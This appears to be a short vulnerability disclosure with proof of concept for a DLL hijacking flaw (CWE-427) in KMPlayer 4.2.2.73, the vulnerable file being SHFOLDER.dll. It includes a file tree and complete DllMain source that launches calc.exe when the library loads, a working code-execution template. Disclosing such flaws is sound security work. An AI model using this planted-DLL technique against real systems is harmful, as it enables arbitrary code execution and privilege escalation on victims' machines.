PandoraTV.
KMPlayer x32
KMPlayer_4.2.2.73(Latest)
KMPlayer was discovered to contain a DLL hijacking vulnerability that allows attackers to escalate privileges and execute arbitrary code via a crafted DLL.
SHFOLDER.dll
CWE-427: Uncontrolled Search Path Element
Current Working Directory (CWD) DLL planting
https://drive.google.com/file/d/1bdYaDmtWhnjaHkzv3bZ4PUSMzDJ8JjSV/view?usp=sharing
kmp32# tree
.
├── KMPlayer_4.2.2.73.exe
├── KMPlayer_poc.mp4
└── SHFOLDER.dll
// dllmain.cpp
#include "pch.h"
#include <stdlib.h>
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
system("calc.exe");
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}